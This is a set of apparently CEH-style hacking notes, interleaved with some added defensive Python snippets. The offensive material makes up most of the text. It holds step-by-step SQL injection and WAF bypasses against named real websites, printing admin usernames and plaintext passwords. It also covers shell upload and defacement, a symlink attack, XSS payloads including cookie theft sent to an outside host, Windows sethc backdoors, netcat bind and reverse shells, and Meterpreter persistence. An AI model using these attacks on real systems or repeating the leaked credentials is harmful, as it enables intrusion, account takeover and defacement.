    > upload your shell [ .php, .aspx, .asp, .jsp ]
NOTE : sometimes the shell is not uploaded directly, so rename its extension to some other file type and run the "Tamper Data" Firefox add-on while uploading the shell; remove your extension while uploading.
    > eg : http://www.arenamultimedia.in/news.aspx?id=news
===========================================================
1. SQL Injection : www.mags.edu.in/aboutus.php?id=2
www.mags.edu.in/aboutus.php?id=2'                  |<-- Error
www.mags.edu.in/aboutus.php?id=2 order by 1        |<-- No error
www.mags.edu.in/aboutus.php?id=2 order by 100      |<-- Error
www.mags.edu.in/aboutus.php?id=2 order by 10       |<-- Error
www.mags.edu.in/aboutus.php?id=2 order by 2        |<-- Error + page content
So, directly find the vulnerable column...
www.mags.edu.in/aboutus.php?id=2 union select 1    |<-- Shows nothing
www.mags.edu.in/aboutus.php?id=-2 union select 1   |<-- Vulnerable column is = 1
www.mags.edu.in/aboutus.php?id=-2 union select 1,2 |<-- Error
Now,
1. Find the version of the database.
   > www.mags.edu.in/aboutus.php?id=-2 union select @@version | 5.0.96-log
2. Find the database name
   > www.mags.edu.in/aboutus.php?id=-2 union select database() | magschool
3. To find the tables in the database
   www.mags.edu.in/aboutus.php?id=-2 union select group_concat(table_name) from information_schema.tables where table_schema=database()
   amaps_admin -----> 0x616d6170735f61646d696e [ hex encoding of the table name ], campusphotos, categories, celebration, contentmanagement, courses, domains, engineering, events, facilities, faculty, medmain, news, pending, query_log, register_form, site_category, sites, temp
4. To find the columns in the table
   www.mags.edu.in/aboutus.php?id=-2 union select group_concat(column_name) from information_schema.columns where table_name=0x616d6170735f61646d696e
   adminid, username, password
5. To find the username & password :
   www.mags.edu.in/aboutus.php?id=-2 union select group_concat(adminid,0x3a,username,0x3a,password) from amaps_admin
   adminid = 1
   username = adminmags
   password = magsmet#749$
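The walkthrough above works because the id parameter is pasted straight into the SQL text, so "order by" and "union select" become part of the statement and every error message doubles as an oracle. This added example (not the site's code and not the author's) rebuilds that pattern against an in-memory SQLite database and puts the hardened form beside it; the schema, sample rows and function names are assumptions constructed for illustration.

```python
"""Vulnerable string-built lookup beside a parameterized one, on SQLite.

Added example, not the notes' or the site's own code. The aboutus and
amaps_admin tables and their rows are constructed for illustration.
"""
import sqlite3


def build_db():
    """In-memory database shaped like the walkthrough: a content table and an admin table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE aboutus (id INTEGER PRIMARY KEY, content TEXT);
        CREATE TABLE amaps_admin (adminid INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO aboutus VALUES (1, 'Welcome'), (2, 'About the school');
        INSERT INTO amaps_admin VALUES (1, 'example_admin', 'example_hash');
        """
    )
    return conn


def vulnerable_lookup(conn, user_input):
    """The bug behind aboutus.php?id=...: the raw parameter is concatenated into SQL.

    Whatever follows `id = ` is parsed as SQL, so `-2 union select ...`
    appends an attacker-chosen SELECT whose rows come back as page content,
    and `2'` or `2 order by 2` raise errors that reveal the query's shape.
    """
    sql = "SELECT content FROM aboutus WHERE id = " + user_input  # never do this
    return [row[0] for row in conn.execute(sql).fetchall()]


def safe_lookup(conn, user_input):
    """Hardened form: validate the type, then bind the value as a parameter.

    A `?` placeholder sends the value separately from the SQL text, so it can
    never change the statement's structure; the int() check additionally
    rejects anything that is not a page id before the database sees it.
    """
    try:
        page_id = int(user_input)
    except (TypeError, ValueError):
        return None
    row = conn.execute("SELECT content FROM aboutus WHERE id = ?", (page_id,)).fetchone()
    return row[0] if row else None


def probe(conn, lookup, user_input):
    """Mimic the `order by` oracle from the notes: did the endpoint error out?"""
    try:
        lookup(conn, user_input)
        return "ok"
    except sqlite3.Error:
        return "error"


def decode_hex_literal(literal):
    """Why the notes write 0x616d6170735f61646d696e: it is the table name as a hex literal."""
    return bytes.fromhex(literal[2:]).decode("ascii")


if __name__ == "__main__":
    db = build_db()
    payloads = ("2", "2'", "2 order by 1", "2 order by 2",
                "-2 union select sqlite_version()",
                "-2 union select group_concat(name) from sqlite_master")
    for payload in payloads:
        print(f"{payload!r:58} vulnerable={probe(db, vulnerable_lookup, payload):5} "
              f"safe={safe_lookup(db, payload)!r}")
    print(decode_hex_literal("0x616d6170735f61646d696e"))
```

sqlite_version() and sqlite_master stand in for MySQL's @@version and information_schema.tables; the parameterized version returns None for every payload and raises no error, so the column-counting oracle disappears with the injection.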
______________________________________________________________________________
2. SQL Injection WAF Bypass
http://www.geca.ac.in/departments/hod.php?id=14
http://www.geca.ac.in/departments/hod.php?id=14'
http://www.geca.ac.in/departments/hod.php?id=14 order by 1
http://www.geca.ac.in/departments/hod.php?id=14 order by 2
http://www.geca.ac.in/departments/hod.php?id=14 order by 3
http://www.geca.ac.in/departments/hod.php?id=14 order by 4
http://www.geca.ac.in/departments/hod.php?id=14 order by 5
http://www.geca.ac.in/departments/hod.php?id=14 order by 6
http://www.geca.ac.in/departments/hod.php?id=14 order by 7
http://www.geca.ac.in/departments/hod.php?id=14 order by 8
http://www.geca.ac.in/departments/hod.php?id=14 order by 9
-----------------------------------------------------------
www.geca.ac.in/departments/hod.php?id=14 union select 1,2,3,4,5,6,7,8,9
Not Acceptable! | An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.
So,
www.geca.ac.in/departments/hod.php?id=14 /**//*!12345union select*//**/1,2,3,4,5,6,7,8,9
www.geca.ac.in/departments/hod.php?id=-14 /**//*!12345union select*//**/1,2,3,4,5,6,7,8,9
Vulnerable Columns = 6,3,5
=====================================================================
www.geca.ac.in/departments/hod.php?id=-14 /**//*!12345union select*//**/1,2,3,4,@@version,6,7,8,9
Version = 5.1.57-rel12.8-log
=====================================================================
Finding Tables :
http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tables*/+where+/*!table_schema*/+like+database()
about_aurangabad
admin_login
album
assignment
login
---------------------------------------------------------------------------------------------------
Finding tables using limit :
http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tables*/+where+/*!table_schema*/+like+database()+limit+1,1
Limit increments like -> 1,1
                         1,2
                         1,3
                         1,4
                         etc
admin_login --------------> 0x61646d696e5f6c6f67696e
=====================================================================
http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,column_name,6,7,8,9+from+/*!information_schema.columns*/+where+/*!table_name*/+like+0x61646d696e5f6c6f67696e
admin_id
user_name
pass_word
fname
lname
backpage
----------------------------------------------------------------------------------------------------
Using limit :
http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,column_name,6,7,8,9+from+/*!information_schema.columns*/+where+/*!table_name*/+like+0x61646d696e5f6c6f67696e+limit+1,1
Limit increments like -> 1,1
                         1,2
                         1,3
                         1,4
                         etc
user_name
=====================================================================
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,admin_id,6,7,8,9+from+admin_login
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
admin_id = 1
---------------------------------------------------------------------------------------------------------------------
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,user_name,6,7,8,9+from+admin_login
user_name = admin@325
---------------------------------------------------------------------------------------------------------------------
http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,pass_word,6,7,8,9+from+admin_login
pass_word = z9xexTqZk%+-328123z9xexTqZk%+-328123
---------------------------------------------------------------------------------------------------------------------
http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,fname,6,7,8,9+from+admin_login
fname = shriram
---------------------------------------------------------------------------------------------------------------------
http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,lname,6,7,8,9+from+admin_login
lname = chaudhari
---------------------------------------------------------------------------------------------------------------------
http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,email,6,7,8,9+from+admin_login
email = [email protected]
---------------------------------------------------------------------------------------------------------------------
http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,backpage,6,7,8,9+from+admin_login
backpage =index.php
---------------------------------------------------------------------------------------------------------------------
3. Xpath Injection http://zerofreak.blogspot.in/2012/02/tutorial-by-zer0freak-zer0freak-sqli.html
Step 1: Inject --> +and extractvalue(rand(),concat(0x0a,version()))--
Eg:
http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,version()))--
msg: Could not query:XPATH syntax error: ' 5.5.32-cll'
=====================================================================
Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from /*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :RecipeIngredients'
-----------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from /*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+
msg: Could not query:XPATH syntax error: ' :SS_categories'
------------------------------------------------------------------------
Respectively, for limit 2,3,4,5,6,7,8... the messages are:
msg : Could not query:XPATH syntax error: ' :SS_ordered_carts'
Could not query:XPATH syntax error: ' :SS_orders'
Could not query:XPATH syntax error: ' :SS_products'
Could not query:XPATH syntax error: ' :SS_products2'
Could not query:XPATH syntax error: ' :SS_special_offers'
Could not query:XPATH syntax error: ' :categories'
Could not query:XPATH syntax error: ' :details'
Could not query:XPATH syntax error: ' :productrange'
Could not query:XPATH syntax error: ' :recipes'
Could not query:XPATH syntax error: ' :visitors'
=====================================================================
Note : Convert table name to HEX [String to hex conversion]
Eg : details : 64657461696c73 or 0x64657461696c73
=====================================================================
Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name=0x64657461696c73 limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from /*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :cust_firstname'
----------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Respectively, for limit 2,3,4,5,6,7,8... the messages are:
msg: Could not query:XPATH syntax error: ' :cust_lastname'
msg: Could not query:XPATH syntax error: ' :cust_country'
msg: Could not query:XPATH syntax error: ' :cust_zip'
msg: Could not query:XPATH syntax error: ' :cust_state'
msg: Could not query:XPATH syntax error: ' :cust_city'
msg: Could not query:XPATH syntax error: ' :cust_address'
msg: Could not query:XPATH syntax error: ' :cust_phone'
=====================================================================
Note : I got
Table -> users
Columns -> Password & Email
So,
=====================================================================
Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select concat(email,0x3a,password) from users limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from /*!users*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :email:password'
=====================================================================
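The two query shapes above (the comment-obfuscated UNION SELECT against information_schema in the union section, and the extractvalue() error-based probe in the XPath section) leave a recognisable trail in web-server logs. The Python below is an added example written for these notes, not code from the notes' author or from any site mentioned: it normalises a request's query string (URL decoding, `+` as space, MySQL `/*!...*/` and `/**/` comments), matches the result against a few indicators, and shows the hardened lookup (type check plus bound parameter) that closes the hole. The log lines, paths and the `hod` table are constructed sample data.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed access-log lines in combined log format (sample data, not from any real server).
# Lines 2 and 3 carry the two query shapes discussed above.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Dec/2014:10:00:01 +0000] "GET /item.php?id=14 HTTP/1.1" 200 5120
203.0.113.5 - - [31/Dec/2014:10:00:07 +0000] "GET /item.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tables*/+where+/*!table_schema*/+like+database() HTTP/1.1" 200 5200
198.51.100.9 - - [31/Dec/2014:10:01:15 +0000] "GET /page.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,version()))-- HTTP/1.1" 500 310
198.51.100.9 - - [31/Dec/2014:10:01:20 +0000] "GET /page.php?ID=3 HTTP/1.1" 200 8000
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)   # /*!12345union select*/ -> union select
ANY_COMMENT = re.compile(r"/\*.*?\*/", re.S)                  # /**/ used as a whitespace substitute

INDICATORS = {
    "union_select": re.compile(r"\bunion\b\s*(all\s+)?\bselect\b"),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "error_based_xpath": re.compile(r"\b(extractvalue|updatexml)\s*\("),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{6,}\b"),
    "comment_terminator": re.compile(r"--(\s|$)"),
}


def normalize(query_string: str) -> str:
    """Undo the evasions used in the notes: URL encoding, '+' for space,
    MySQL versioned comments and empty comments; then lower-case."""
    s = query_string
    for _ in range(3):                      # peel layered URL encoding
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = VERSIONED_COMMENT.sub(r"\1", s)     # keep the SQL hidden inside /*!...*/
    s = ANY_COMMENT.sub(" ", s)             # drop /**/ and ordinary comments
    return re.sub(r"\s+", " ", s).lower()


def scan_log(text: str) -> list:
    """Return one finding per request whose query string matches an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or "?" not in m.group("target"):
            continue
        path, qs = m.group("target").split("?", 1)
        hits = [name for name, rx in INDICATORS.items() if rx.search(normalize(qs))]
        if hits:
            findings.append({"ip": m.group("ip"), "path": path,
                             "status": m.group("status"), "indicators": hits})
    return findings


def lookup_by_id(conn: sqlite3.Connection, raw_id: str):
    """Hardened form of a lookup like hod.php?id=...: validate the type, then bind
    the value as a parameter so it can never be parsed as SQL."""
    try:
        record_id = int(raw_id)
    except ValueError:
        return None
    return conn.execute("SELECT id, name FROM hod WHERE id = ?", (record_id,)).fetchone()


def demo_db() -> sqlite3.Connection:
    """In-memory table with one constructed row, standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hod (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO hod VALUES (14, 'sample department head')")
    return conn


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    conn = demo_db()
    print(lookup_by_id(conn, "14"))
    print(lookup_by_id(conn, "-14 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables"))
```

normalize() is what makes the inline-comment tricks visible: `/*!12345union+select*/` becomes `union select` before the patterns run. On the application side, lookup_by_id() rejects anything that is not an integer and binds the value, so injected text is never parsed as SQL; serving a generic error page instead of the raw MySQL error also removes the channel the extractvalue() technique relies on.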
4. DNN Portal Hacking 1 : inurl:tabid/176/Default.aspx
2 : inurl:"/portals/0/" site:.com
3 : inurl:/tabid/36/language/en-US/Default.aspx
4 : inurl:/portals/0/default.aspx
5 : DNN(Link Gallary)
6 : inurl:/tabid/36/language/en-US/Default.aspx
7 : inurl:fcklinkgallery.aspx
step 1 : http://www.parallax.com/tabid/768/productid/92/default.aspx [ Find a website with
the above vulnerabilities ]
> Replace : /tabid/768/productid/92/default.aspx
> With : /Providers/Htmleditorproviders/fck/fcklinkgallery.aspx
step 2 : http://www.parallax.com/Providers/Htmleditorproviders/fck/fcklinkgallery.aspx
step 3 : click on File (A File On Your Site) and then replace the link with -->
javascript:__doPostBack('ctlURL$cmdUpload','')
step 4 : you will see the upload button. Upload { shell , Deface it , put your signature}
step 5: http://www.parallax.com/portals/0/shadow.txt
5. Symlink Attack
1] Upload shell 404.php on your hacked website and root the webserver.
2] Upload contact.php & database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php
3] go to [sec. info] in your shell then [readable : etc/passwd <view>]
4] copy all username & passwd from [ etc/passwd ]
5] paste in [ http://site.com/contact.php ] [ config fucker ] tab.
6] now open your both links : [ http://site.com/database.php & http://site.com/configweb ]
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/
7] on configweb page [ you have some text that contain user & password ] [ these files are
reverse or linked website details ]
8] Now login to them using database.php [ change password in database ]
9] login to main site then and deface there index.php page.
6. XSS
1. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
2. <IMG SRC="javascript:alert('XSS');">
3. <IMG SRC=javascript:alert('XSS')>
4. <IMG SRC=JaVaScRiPt:alert('XSS')>
5. <IMG SRC=JaVaScRiPt:alert('XSS')>
6. <IMG SRC=javascript:alert("XSS")>
7. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
8. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
10. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
11. <IMG SRC=javascript:al&#101;rt('XSS')>
12. <IMG SRC=javascri&#0000112t:alert('XSS')>
13. <IMG SRC="javascript:alert('XSS');">
==========================================================================
Hands On Series – Cross Site Scripting (XSS) Part 1
In this episode we start dealing with Cross Site Scripting (XSS) attacks.
CSS = Cascading Style Sheets
XSS = Cross Site Scripting
Cross Site Scripting is a technique used to add script to a trusted site that will be executed in other users'
browsers.
A key element to XSS is that one user can submit data to a website that will later be displayed for other
users.
It is necessary that the bad guy NOT mess up the HTML structure, otherwise the result will be web
defacement rather than attacking other users.
The hackme site has been updated and improved (more about that in a moment)
and now includes a section for XSS which we will be using in this episode.
As usual, for the “Hands on Series” I recommend that you listen to these episodes while viewing the
hacking test site and
have the show notes visible and ready to cut and paste from.
If we look at the source for the page we will see this:
Let's start by trying to somehow add an attribute so that when someone mouses over the name, the
javascript will be executed.
----------------------------------------------------------------------------------------------------------------------------
Attack #1 – Against Email Address
=================================
Attack 1: Original
<a href="mailto:[email protected]">John Doe</a>
Attack 1: Desired addition
onmouseover="alert('Hacked');"
Attack 1: Desired Result
<a href="mailto:[email protected]" onmouseover="alert('Hacked');">Bob Smith</a>
Attack 1: Attack String
[email protected]" onmouseover="alert('Hacked');
Attack 1: Actual Result
<a href="mailto:[email protected]" onmouseover="alert('Hacked');">Bob Smith</a>
Success! Mouse over the Name you entered and you see a popup that says "I hacked you".
At this point we have proven that we can insert code onto the site and have it executed by a web
browser!
This attack is only executed based on a user event (the user mousing over the link)
Let's try creating a script tag, which will get executed while the page is loaded by the browser (so
basically right away).
-----------------------------------------------------------------------------------------------------------------------------
Attack #2 – Against Email Address
=================================
Attack 2: Original
<a href="mailto:[email protected]">John Doe</a>
Attack 2: Desired addition
<script>alert('Hacked');</script>
Attack 2: Desired Result
<a href="mailto:[email protected]"><script>alert('Hacked');</script><">Bob Smith</a>
Attack 2: Attack String
[email protected]"><script>alert('Hacked');</script><"
Attack 2: Actual Result
<a href="mailto:[email protected]"><script>alert('Hacked');</script><"">Bob Smith</a>
Failure! No popup takes place.
Notice the Actual Result does not match the Desired Result.
This is because of htmlentities as mentioned in the helper notes.
-----------------------------------------------------------------------------------------------------------------------------
Attack #3 – Against Title
=========================
Attack 3: Original
<td>Works Great</td>
Attack 3: Desired addition
<script>alert('Hacked');</script>
Attack 3: Desired Result
<td><script>alert('Hacked');</script></td>
Attack 3: Attack String
Works Great<script>alert('Hacked');</script>
Attack 3: Actual Result
<td>Works Great<script>alert('Hacked');</script></td>
Failure! No popup takes place.
This almost worked, except that the single and double quotes get escaped, so let's try making something
that doesn't need quotes.
-----------------------------------------------------------------------------------------------------------------------------
Attack #4 – Against Title
=========================
In the alert function let's use the global variable document.domain in the attack string.
Attack 4: Attack String
Works Great<script>alert(document.domain);</script>
Attack 4: Actual Result
<td>Works Great<script>alert(document.domain);</script></td>
Success! A popup should appear that says hackme.ntobjectives.com
Maybe this isn't convincing enough... let's try cookies.
-----------------------------------------------------------------------------------------------------------------------------
Attack #5 – Against Title
=========================
Attack 5: Attack String
Works Great<script>alert(document.cookie);</script>
Attack 5: Actual Result
<td>Works Great<script>alert(document.cookie);</script></td>
Success! A popup should appear that shows all your cookie data.
There's nothing stopping the hacker from having the user send this data to their server.
I have set up a page for displaying inputs sent to it, but it makes sure to escape characters to make sure
this isn't an attack point.
http://hackme.ntobjectives.com/xss/bin.php
Try it now
http://hackme.ntobjectives.com/xss/bin.php?abc=123
You should be shown that abc=123
This page will display anything you put in the GET params.
I want to push your cookie data over to my site, so that I can attempt a session take over.
-----------------------------------------------------------------------------------------------------------------------------
Attack #6 – Against Title
=========================
Attack 6: Original
<td>Works Great</td>
Attack 6: Desired addition
<script>window.location='http://hackme.ntobjectives.com/xss/bin.php?var='+document.cookie;</script>
We have already established that I cannot insert those single quotes that I need around the URL, so we
need to enter into a little more advanced methods.
Using the javascript function String.fromCharCode allows me to get around needing quotes by turning
each decimal value into its character, and it doesn't require any quotes.
So we just convert our desired string into decimal first
This:
http://hackme.ntobjectives.com/xss/bin.php?var=
becomes:
104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61
and the attack string becomes
Attack 6: Attack String
Works Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script>
Attack 6: Actual Result
<td>Works Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script></td>
Success! Your browser should be sitting on http://hackme.ntobjectives.com/xss/bin.php and showing
you all the data from your cookies.
If this were an attacker's site, it would just collect the info and pass you back to the page you came from,
and it's unlikely you would have ever noticed that your session information had been stolen.
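What decides the outcome of Attacks 1 through 6 is which characters the site encodes in which context. The Python below is an added example written for these notes (it is not the series' own code or the hackme site's): it renders the two fields from the series with a vulnerable, a quotes-only and a fully escaped encoder, and checks whether an input of the same shape as the Attack 1 and Attack 4 strings breaks out of its context. The attack strings and the placeholder e-mail address are constructed.

```python
import html
import re

# Crude indicator of a successful break-out: a closing quote followed by an
# event-handler attribute, or a raw <script> tag, appearing in the rendered output.
BREAKOUT = re.compile(r'"\s+on\w+\s*=|<\s*script\b', re.IGNORECASE)


def render_contact_unsafe(email: str, name: str) -> str:
    """Vulnerable pattern: user input concatenated straight into markup."""
    return f'<a href="mailto:{email}">{name}</a>'


def render_contact_safe(email: str, name: str) -> str:
    """Attribute context: escape &, <, >, " and ' so the value cannot close the quote."""
    return f'<a href="mailto:{html.escape(email, quote=True)}">{html.escape(name)}</a>'


def render_title_quotes_only(title: str) -> str:
    """Models the Title field in the series: quotes are escaped, angle brackets are not.
    This is why Attack 3 failed but Attack 4 (which needs no quotes) succeeded."""
    return "<td>" + title.replace('"', "&quot;").replace("'", "&#x27;") + "</td>"


def render_title_safe(title: str) -> str:
    """Text context: html.escape neutralises < and > as well, so <script> never forms."""
    return "<td>" + html.escape(title, quote=True) + "</td>"


def breaks_out(rendered: str) -> bool:
    """True when the rendered fragment contains live injected markup."""
    return BREAKOUT.search(rendered) is not None


# Constructed inputs with the same shape as Attack 1 and Attack 4 in the series
# (placeholder address; the series' own address is not reproduced here).
ATTACK_EMAIL = 'user@example.invalid" onmouseover="alert(1);'
ATTACK_TITLE = "Works Great<script>alert(document.domain);</script>"

if __name__ == "__main__":
    for label, out in [
        ("contact/unsafe", render_contact_unsafe(ATTACK_EMAIL, "Bob Smith")),
        ("contact/safe", render_contact_safe(ATTACK_EMAIL, "Bob Smith")),
        ("title/quotes-only", render_title_quotes_only(ATTACK_TITLE)),
        ("title/safe", render_title_safe(ATTACK_TITLE)),
    ]:
        print(f"{label:18} breakout={str(breaks_out(out)):5} {out}")
```

html.escape() with quote=True is enough for both contexts here: in the attribute the `"` becomes `&quot;` so the value cannot end early, and in the cell `<` becomes `&lt;` so the tag never forms. Escaping only quotes, as the Title field does, stops Attack 3 but not Attack 4. Marking the session cookie HttpOnly would also keep document.cookie empty for Attacks 5 and 6, although it does nothing against the injection itself.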
7. Shell Uploading & Defacement
8. PHP Disclosing [ site.com/a.php?id=index.php ] [ Disclose index.php ]
9. Manipulating Parameters Step1 : open site and search for hidden elements...
Step2 : Change the hidden elements' value using Tamper Data or the developer toolkit [
Firefox add-ons ]
10. Dictionary Attack
11. Heart bleed
12. DNS Zone Transfer
13. Brute Force Attack Against SCADA Systems
System Hacking 1. ADS [Alternate Data Streams]
Practical Guide to Alternate Data Streams in NTFS step1 : type "tab.mp4" > C:\hack\tab.mp4:tab.mp4
go to location --> C:\hack\
type command : i. dir -> it shows all stuff in the directory; then confirm that tab.mp4 has been made with 0kb
size....... then ,
ii. start vlc tab.mp4:tab.mp4
To detect ADS files use (Only recovery tools can find these files): i. ADS Spy v1.11
ii. get my data back
2. System Password Hacking & Cracking ophCrack (Crack password)
John The Ripper (Crack password)
Cain & Abel (Crack password)
slax work (Crack password)
hiren boot cd (Remove password)
ERD commander (till win 7) [reset password & repair & recovery of windows from boot
sector virus] (Remove password)
Saminside [windows tool] [U can dump any sam file to it for cracking] (Remove password)
Kon-Boot (Login Page Bypassing)
3. Back Doors
1. Win-XP
> C:\Windows\System32
> copy CMD.EXE
> Change Name to " sethc.exe "
> Put back sethc.exe to " system32 " folder
2. Win-7
> C:\Windows\System32
> look for " ULTRAMAN.EXE " change its permission , ownership and name .
> copy cmd.exe to desktop and rename it to " ULTRAMAN.EXE ", then put it back in the
system32 folder.
NOW :
> at login page press shift 5 times.
> cmd will pop up type command
> net user <username> /del , /add , * [ remove and reset password ]
3. NetCat : [ Netcat can simply be described as a tool that can read and write to
TCP and UDP ports. This dual functionality suggests that Netcat runs in two
modes:“client” and “server”. ]
I. Connect to TCP/UDP Ports
> localhost ~ # nc -h [ Help ]
> localhost ~ # nc -vv www.site.com 22 [ nc -vv <site> <port> ]
Bind Shell
> Victim / User1 :
> C:\>nc -lvvp 4444 -e cmd.exe
> Attacker / User2 :
> BT ~ # nc -v 192.168.0.198 4444 [ User1 "cmd" comes to User2 ]
Reverse Shell
> User1 :
> C:\>nc -lvvp 4444
> User2 :
> BT ~ # nc -v 192.168.0.198 4444 -e /bin/bash [ Now, User2 is sending
his "shell" to User1 ]
Uploading Netcat After Hacking With Metasploit :
meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter > reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
meterpreter > reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run -v NETCAT -d 'C:\\WINDOWS\\system32\\nc.exe -L -d -p 1234 -e cmd.exe'
meterpreter > reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
Note : Netcat can be installed on Win XP, Vista and 7 [ Once netcat is installed
successfully on the victim OS there is no need to exploit again; use the commands :]
root@bt:~# nc <victim ip> <port>
root@bt:~# nc 192.168.217.141 1234
4. Steganography
1. hiding text on image
> run
> cmd
> cd desktop
> copy /b image.jpg+password.txt final_image.jpg
2. OpenPuff
> Freeware, 256-bit multi-encryption, Carrier chains, Multi-layered obfuscation
5. Detect Steganography
Backtrack Forensics: Steganography
Menu: Forensics -> Forensic Analysis Tools
Directory: /usr/local/bin/
stegbreak
stegcompare
stegdeimage
stegdetect
stegdetect is a tool to detect steganography in image files, it supports different methods, which are
used to hide content. Currently, the detectable schemes are: jsteg, jphide (unix and windows),
invisible secrets, outguess 01.3b, F5 (header analysis), appendX and camouflage. Stegbreak is
used to launch dictionary attacks against JSteg-Shell, JPHide and OutGuess 0.13b.
Before we start to use the tools we need an image, which has some hidden content. Let's review a
few hiding apps before using stegdetect. As I didn't find any preinstalled in BT, I installed
steghide first, which can hide content in jpeg, bmp, wav, au files.
Using steghide:
apt-get install steghide - installation
steghide --info IMG_4422.JPG - get info from the image (how much data can be hidden)
steghide --embed -ef mysecret.txt -cf IMG_4422.JPG -sf steg.jpg -p mypass -Z - hide
mysecret.txt with password "mypass", and create a new file, where the file is hidden, and don't
compress data
steghide --embed -ef mysecret.txt -cf IMG_4422.JPG -sf steg.jpg -p mypass - same as the
previous but w/ compression
steghide --extract -xf mysecret2.txt -sf steg2.jpg -p mypass - extract the file
The bad news is that stegdetect won't detect the steghide algorithm. Despite that, I tried it to see
what happens.
Using stegdetect:
stegdetect -t [list of tests] steg.jpg - where tests can be (by default jopifa enabled):
j - Tests if information has been embedded with jsteg.
o - Tests if information has been embedded with outguess.
p - Tests if information has been embedded with jphide.
i - Tests if information has been hidden with invisible secrets.
f - Tests if information has been hidden with F5.
F - Tests if information has been hidden with F5 using a more sophisticated but fairly slow
detection algorithm.
a - Tests if information has been added at the end of file, for example by camouflage or
appendX.
